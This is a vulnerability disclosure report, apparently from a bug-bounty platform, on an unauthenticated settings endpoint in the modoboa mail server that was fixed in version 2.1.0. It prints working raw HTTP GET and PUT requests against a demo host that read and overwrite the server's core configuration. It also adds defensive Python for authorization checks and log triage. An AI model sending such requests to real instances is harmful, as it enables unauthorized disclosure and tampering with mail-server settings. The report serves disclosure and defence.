Improper Authorization in modoboa/modoboa

Valid

Reported on

Feb 25th 2023


Description

During testing, it was observed that sending a GET request to the following endpoint: /api/v2/parameters/core/ returns sensitive information without any authentication or authorization.

Request

GET /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 0
Connection: close


Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:26:58 GMT
Content-Type: application/json
Content-Length: 1709
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en

{"label":"General","params":{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}}

The response contained sensitive information which could be used by an attacker to gain unauthorized access to the system. This issue poses a significant risk to the confidentiality and integrity of the system and its users, because the information returned by the request can be modified using another PUT request.

Request

PUT /api/v2/parameters/core/ HTTP/1.1
Host: demo.modoboa.org
User-Agent: 7h3h4ckv157
Accept: application/json, text/plain, */*
Accept-Language: en
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 1680
Connection: close

{"authentication_type":"local","password_scheme":"sha512crypt","rounds_number":70000,"update_scheme":true,"default_password":"Pwned-by-7h3h4ckv157","random_password_length":8,"update_password_url":"","password_recovery_msg":"","sms_password_recovery":false,"sms_provider":null,"ldap_server_address":"localhost","ldap_server_port":389,"ldap_enable_secondary_server":false,"ldap_secondary_server_address":"localhost","ldap_secondary_server_port":389,"ldap_secured":"none","ldap_is_active_directory":false,"ldap_admin_groups":"","ldap_group_type":"posixgroup","ldap_groups_search_base":"","ldap_password_attribute":"userPassword","ldap_auth_method":"searchbind","ldap_bind_dn":"","ldap_bind_password":"","ldap_search_base":"","ldap_search_filter":"(mail=%(user)s)","ldap_user_dn_template":"","ldap_sync_bind_dn":"","ldap_sync_bind_password":"","ldap_enable_sync":false,"ldap_sync_delete_remote_account":false,"ldap_sync_account_dn_template":"","ldap_enable_import":false,"ldap_import_search_base":"","ldap_import_search_filter":"(cn=*)","ldap_import_username_attr":"cn","ldap_dovecot_sync":false,"ldap_dovecot_conf_file":"/etc/dovecot/dovecot-modoboa.conf","rss_feed_url":null,"hide_features_widget":false,"sender_address":"noreply@yourdomain.test","enable_api_communication":true,"check_new_versions":true,"send_new_versions_email":false,"new_versions_email_rcpt":"postmaster@yourdomain.test","send_statistics":true,"inactive_account_threshold":30,"top_notifications_check_interval":30,"log_maximum_age":365,"items_per_page":30,"default_top_redirection":"user","sms_ovh_endpoint":"ovh-eu","sms_ovh_application_key":null,"sms_ovh_application_secret":null,"sms_ovh_consumer_key":null}

Response

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Sat, 25 Feb 2023 03:24:46 GMT
Content-Length: 0
Connection: close
Vary: Accept, Accept-Language, Cookie
Allow: GET, PUT, HEAD, OPTIONS
X-Frame-Options: SAMEORIGIN
Content-Language: en
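The two exchanges above show a settings endpoint that serves both reads and writes to an anonymous caller. The following is an added, framework-free Python sketch of the check that needs to sit in front of such an endpoint: it is not modoboa's code and does not reproduce the project's actual fix. The `User`, `Request`, `Response` and `CoreParametersEndpoint` names and the `CORE_PARAMS` sample are constructed for this example; the parameter keys are taken from the response body in the report. The `enforce_authorization=False` mode exists only to reproduce the reported behaviour side by side with the hardened one.

```python
from dataclasses import dataclass, field
from typing import Optional


@dataclass
class User:
    username: str
    is_superuser: bool = False


@dataclass
class Request:
    method: str
    user: Optional[User] = None          # None models an anonymous caller
    body: dict = field(default_factory=dict)


@dataclass
class Response:
    status: int
    body: dict = field(default_factory=dict)


# Constructed subset of the parameter set visible in the report's response.
CORE_PARAMS = {
    "authentication_type": "local",
    "password_scheme": "sha512crypt",
    "default_password": "change-me",
    "ldap_bind_dn": "",
    "ldap_bind_password": "",
}


class CoreParametersEndpoint:
    """Minimal stand-in for a /parameters/core/ style view.

    With enforce_authorization=False every verb is served to anyone, which is
    what the report observed.  With the default (True) the caller must be
    authenticated AND a superuser before any verb-specific code runs, so GET
    and PUT cannot drift apart in what they require.
    """

    def __init__(self, params: dict, enforce_authorization: bool = True):
        self.params = dict(params)       # copy: the shared sample is never mutated
        self.enforce_authorization = enforce_authorization

    def authorize(self, request: Request) -> Optional[Response]:
        """Return a denial Response, or None when the caller may proceed."""
        if not self.enforce_authorization:
            return None                  # vulnerable behaviour, kept for comparison
        if request.user is None:
            return Response(401, {"detail": "authentication required"})
        if not request.user.is_superuser:
            return Response(403, {"detail": "superuser required"})
        return None

    def handle(self, request: Request) -> Response:
        denied = self.authorize(request)  # single choke point for every verb
        if denied is not None:
            return denied
        if request.method == "GET":
            return Response(200, {"label": "General", "params": dict(self.params)})
        if request.method == "PUT":
            unknown = sorted(set(request.body) - set(self.params))
            if unknown:                  # reject keys the schema does not know
                return Response(400, {"detail": f"unknown parameters: {unknown}"})
            self.params.update(request.body)
            return Response(200)
        return Response(405)


if __name__ == "__main__":
    anonymous_put = Request("PUT", body={"default_password": "attacker-chosen"})
    vulnerable = CoreParametersEndpoint(CORE_PARAMS, enforce_authorization=False)
    fixed = CoreParametersEndpoint(CORE_PARAMS)
    print("vulnerable anonymous PUT ->", vulnerable.handle(anonymous_put).status)
    print("fixed anonymous PUT      ->", fixed.handle(anonymous_put).status)
    admin = User("admin", is_superuser=True)
    print("fixed superuser PUT      ->",
          fixed.handle(Request("PUT", user=admin, body={"items_per_page": 50})).status
          if "items_per_page" in fixed.params else
          fixed.handle(Request("PUT", user=admin, body={"default_password": "n3w"})).status)
```

The point of routing every verb through `authorize()` first is that a view cannot accidentally protect `PUT` while leaving `GET` open, or the reverse; the report shows both verbs answering with 200 to a request carrying no session or token at all, which is exactly the failure mode a single entry check prevents.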


Proof of Concept

poc1.png

poc2.png

Impact

The impact of this vulnerability is severe, as it allows an attacker to gain sensitive information and modify it, posing a significant risk to the confidentiality and integrity of the system and its users' data. It is critical to address this vulnerability immediately to prevent any further exploitation by malicious actors.
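Because the PUT path accepted changes without authentication, an operator who ran an affected version needs to establish whether the settings were read or changed before the upgrade. The following is an added Python example, not part of the report or of modoboa, that triages nginx access-log lines in the default combined format for successful requests to the parameters API. The log lines, client addresses and user agents are constructed for the example; the path prefix and the two timestamps come from the report.

```python
import re
from collections import Counter
from datetime import datetime

# nginx "combined" log format: client, ident, user, [time], "request", status, bytes, ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

# Every endpoint under this prefix exposes instance settings; the report covers core/.
TARGET_PREFIX = "/api/v2/parameters/"

# Constructed sample log. Addresses are from documentation ranges; the first two
# lines mirror the successful PUT and GET shown in the report.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Feb/2023:03:24:46 +0000] "PUT /api/v2/parameters/core/ HTTP/1.1" 200 0 "-" "probe-client/1.0"
203.0.113.7 - - [25/Feb/2023:03:26:58 +0000] "GET /api/v2/parameters/core/ HTTP/1.1" 200 1709 "-" "probe-client/1.0"
198.51.100.4 - - [25/Feb/2023:03:30:00 +0000] "GET /api/v2/parameters/core/ HTTP/1.1" 401 58 "-" "Mozilla/5.0"
198.51.100.4 - - [25/Feb/2023:03:30:05 +0000] "GET /api/v2/domains/ HTTP/1.1" 200 412 "-" "Mozilla/5.0"
this line is deliberately unparseable and must be skipped
"""


def parse_line(line: str):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["size"] = 0 if rec["size"] == "-" else int(rec["size"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def successful_parameter_hits(lines):
    """Return records for 2xx requests under the parameters API.

    Writes (PUT) are the higher-priority finding: a 200 there means the
    configuration may have been altered and should be diffed against a
    known-good copy.  Reads (GET) mean the values in the response, including
    any credentials among them, should be treated as disclosed.
    """
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        if rec["path"].startswith(TARGET_PREFIX) and 200 <= rec["status"] < 300:
            hits.append(rec)
    return hits


def summarize(hits):
    """Count successful hits per (client, method) pair for a quick overview."""
    return Counter((h["client"], h["method"]) for h in hits)


if __name__ == "__main__":
    found = successful_parameter_hits(SAMPLE_LOG.splitlines())
    for (client, method), n in sorted(summarize(found).items()):
        print(f"{client:16} {method:4} x{n}")
    for h in found:
        if h["method"] == "PUT":
            print("settings write at", h["ts"].isoformat(), "from", h["client"])
```

Whether an unauthenticated request answered 200 cannot be told from the combined format alone, since `$remote_user` only reflects HTTP Basic authentication; on an affected version every such hit from an address that is not a known administrator workstation should be treated as a finding, and any PUT as a reason to review the current parameter values.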

References

We are processing your report and will contact the modoboa team within 24 hours. 3 months ago
7h3h4ckv157
3 months ago

Researcher


The changes were made directly inside the admin section.

poc3.png

We have contacted a member of the modoboa team and are waiting to hear back 3 months ago
Antoine Nguyen validated this vulnerability 3 months ago
7h3h4ckv157 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
7h3h4ckv157
3 months ago

Researcher


I hope this will get fixed soon.

Regards,

7h3h4ckv157
2 months ago

Researcher


@Maintainer @Admin

Is it possible to add here: https://github.com/modoboa/modoboa/security/advisories

Antoine Nguyen marked this as fixed in 2.1.0 with commit 7bcd3f a month ago
Antoine Nguyen has been awarded the fix bounty
This vulnerability has been assigned a CVE
Antoine Nguyen published this vulnerability a month ago